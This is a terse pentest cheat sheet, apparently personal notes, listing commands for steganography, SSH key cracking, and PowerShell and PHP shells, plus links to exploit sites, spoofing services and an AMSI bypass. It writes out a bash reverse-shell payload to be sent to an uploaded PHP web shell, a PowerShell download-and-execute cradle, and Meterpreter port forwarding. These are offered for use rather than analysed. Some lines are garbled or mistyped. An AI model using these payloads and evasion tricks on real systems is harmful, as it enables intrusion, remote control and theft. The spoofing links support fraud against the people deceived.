tcpdump -i tun0 icmp (for protocol filter)
Categorie: Pentest
Steno
Look at picture for content
- binwalk file.png
Extract files from image
- binwalk -Me file.png
SSH
Use SSH private key
.priv
chmod 600 key.priv
ssh -i key.priv user@x.x.x.x
Extract Password from id_rsa key
python /usr/share/john/ssh2john.py id_rsa > test
john –wordlist=/usr/share/SecLists/Passwords/Leaked-Databases/rockyou-50.txt test
Interesting Sites
Recon / Enumeration
http://www.lifeoverpentest.com/ https://backdoorshell.gitbooks.io/oscp-useful-links/ https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/ https://shahmeeramir.com/penetration-testing-of-an-ftp-server-19afe538be4b https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/ https://www.tarlogic.com/en/blog/how-to-attack-kerberos/ http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet https://www.thegeekstuff.com/2010/07/execute-shell-script/ https://hashes.org/ https://github.com/blackploit/hash-identifier.git
https://ired.team/offensive-security-experiments/offensive-security-cheetsheets
https://www.secjuice.com/powershell-constrainted-language-mode-bypass-using-runspaces/
https://github.com/rasta-mouse?tab=repositories
https://iwantmore.pizza/posts/amsi.html
https://github.com/d0nkeys/redteam/tree/master/code-execution
https://github.com/d0nkeys/redteam
Working AMSI Bypass
https://github.com/aloksaurabh/OffenPowerSh/blob/master/Bypass/Invoke-AmsiBypass.ps1
Exploits
https://nvd.nist.gov/vuln/search https://www.exploit-db.com/ https://packetstormsecurity.com/ https://www.securityfocus.com/vulnerabilities https://0day.tday http://mvfjfugdwgc5uwho.onion/
Social engineering
https://www.spoofmytextmessage.com/ https://www.spoofmyemail.com/
https://goo.gl tinyurl.com
Python
SimpleHTTPServer
- python -m SimpleHTTPServer 4343 (default 8000)
SHELL
- python -c ‘import pty;pty.spawn(“/bin/bash”)’
- stty raw -echo //now push enter enter once type fg enter enter twise
*check rows & colums stty -a stty rows 34 cols 136
export TERM=xterm
Powershell
Encode BASE64
- cat reverse.ps1 | iconv -t UTF-16LE | base64 -w0
- nc -lvnp 9001 (listener)
- $username = ‘username’
- $password = ‘password’
- $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
- $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
- enter-pssession -computername x.x.x.x -Port 5985 -credential $credential
*powershell “IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.9:8000/exploit.html‘)”
Port Knocking
Check for port knock services
- /etc/init.d$ ls
- less knockd
Check config file
- etc/default/knowckd
Run tcp packet on required ports
*for i in 571 290 911; do nmap -Pn -p $i –host-timeout 201 –max-retries 0 x.x.x.x; done
PHP
PHP
Upload php code exec script
- File.php =
- In url
- http://x.x.x.x/File.php?msx=whoami
https://www.acunetix.com/websitesecurity/php-security-2/
PHP shell
in url go to shell.php?command=whoami
In Burpsuite create post request
POST /url/shell.php HTTP/1.1 content command=bash -c ‘bash -i >& /dev/tcp/x.x.x.x/4444 0>&1′
URL encode it to command=bash+-c+’bash+-i+>%26+/dev/tcp/x.x.x.x/4444+0>%261’
Setup NC to listen for incoming connections nc -lvnp x.x.x.x 4444
Nessus
/etc/init.d/nessusd start https://127.0.0.1:8834
Metasploit tips
systemctl start postgresql
cp /usr/share/exploitdb/exploits/cgi/webapps/42344.rb /root/.msf4/modules/exploits/cgi/webapps/
updatedb sessions -u
- search delivery for web payload deliver
- search autoroute for session routes
- search smb_version
- search arp_sweep
Vulnerability Scanning in Metasploit
db_nmap -v --script vuln 192.168.0.184
- hosts
- services
Port forwaring
portfwd add –l 3389 –p 3389 –r target-host
Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell